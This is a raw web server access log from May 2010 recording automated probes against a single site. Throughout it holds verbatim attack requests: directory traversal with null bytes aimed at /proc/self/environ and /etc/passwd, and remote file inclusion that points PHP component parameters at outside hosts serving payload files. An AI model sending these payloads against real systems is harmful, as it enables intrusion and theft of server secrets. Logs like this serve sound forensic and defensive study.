81.93.240.89 - - [05/May/2010:19:52:35 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.93.240.89 - - [05/May/2010:19:52:35 -0700] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.121.181.34 - - [05/May/2010:19:52:58 -0700] "GET /logs/access.log/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.181.34 - - [05/May/2010:19:52:49 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.181.34 - - [05/May/2010:19:52:49 -0700] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:03:18 -0700] "GET /logs/access.log//login.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:03:27 -0700] "GET /login.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:03:18 -0700] "GET /logs//login.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:16:39 -0700] "GET ////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:16:30 -0700] "GET /logs/////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:16:30 -0700] "GET /logs/access.log%20%20/////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:20:19:43 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:20:19:43 -0700] "GET /logs/access.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:20:19:44 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:20:20:21 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:20:20:21 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:20:20:13 -0700] "GET /logs/access.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:22:26 -0700] "GET /logs/access.log/////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.138.88.246 - - [05/May/2010:20:22:31 -0700] "GET /phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.elfagr.net"
78.138.88.246 - - [05/May/2010:20:22:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.elfagr.net"
78.138.88.246 - - [05/May/2010:20:22:47 -0700] "GET /phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
78.138.88.246 - - [05/May/2010:20:22:55 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:25 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:25 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:25 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:44 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:44 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:44 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:55 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:55 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:55 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:55 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:55 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:23:55 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:25:03 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:25:30 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:20:25:59 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:34:21 -0700] "GET /logs/////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:34:21 -0700] "GET ////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
205.234.252.102 - - [05/May/2010:20:34:30 -0700] "GET /logs/access.log%20%20/////assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.138.88.246 - - [05/May/2010:20:36:29 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.elfagr.net"
78.138.88.246 - - [05/May/2010:20:36:20 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.elfagr.net"
78.138.88.246 - - [05/May/2010:20:36:25 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.elfagr.net"
78.138.88.246 - - [05/May/2010:20:36:25 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:20:46:49 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:50:38 -0700] "GET /logs/access.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:50:47 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:50:39 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.133.197.114 - - [05/May/2010:20:53:24 -0700] "GET /index.php?option=com_chronocontact&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
77.222.56.62 - - [05/May/2010:20:58:59 -0700] "GET /logs/access_091112.log//gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:20:58:59 -0700] "GET /gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:20:58:51 -0700] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:20:59:59 -0700] "GET /logs/access_091210.log//gswheel_system_bak/skin/board/setup.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
208.70.149.57 - - [05/May/2010:21:01:21 -0700] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:21:01:13 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.70.149.57 - - [05/May/2010:21:01:13 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
80.91.191.80 - - [05/May/2010:21:01:30 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
93.158.149.32 - - [05/May/2010:21:03:44 -0700] "GET /logs/access_100121.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
80.91.191.80 - - [05/May/2010:21:10:43 -0700] "GET /logs/access.log/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
80.91.191.80 - - [05/May/2010:21:10:34 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
80.91.191.80 - - [05/May/2010:21:10:35 -0700] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
64.251.10.117 - - [05/May/2010:21:48:14 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
66.235.124.132 - - [05/May/2010:21:48:36 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "-" "www.elfagr.net"
66.235.124.132 - - [05/May/2010:21:48:45 -0700] "GET /logs/access.log HTTP/1.1" 200 40362 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.elfagr.net"
64.251.10.117 - - [05/May/2010:21:52:18 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [05/May/2010:21:52:18 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [05/May/2010:21:52:26 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:00:48 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:01:47 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:17:23 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:17:15 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:17:16 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:18:00 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:18:00 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
163.24.136.10 - - [05/May/2010:22:18:10 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:33:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:32:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:41:28 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:41:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:41:37 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:41:29 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:41:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:22:41:29 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:48:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:48:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
87.238.162.183 - - [05/May/2010:22:52:17 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
87.238.162.183 - - [05/May/2010:22:52:08 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
87.238.162.183 - - [05/May/2010:22:52:08 -0700] "GET /logs/access.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:52:32 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:52:33 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:52:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:52:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:52:33 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
91.121.88.80 - - [05/May/2010:22:52:33 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
212.47.221.153 - - [05/May/2010:22:57:52 -0700] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [05/May/2010:22:58:01 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [05/May/2010:22:57:52 -0700] "GET /logs/access.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [05/May/2010:23:01:38 -0700] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [05/May/2010:23:01:46 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [05/May/2010:23:01:38 -0700] "GET /logs/access.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
93.158.149.32 - - [05/May/2010:23:08:26 -0700] "GET /logs/access_100422.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
67.19.33.58 - - [05/May/2010:23:18:44 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:18:53 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:18:53 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:21:43 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
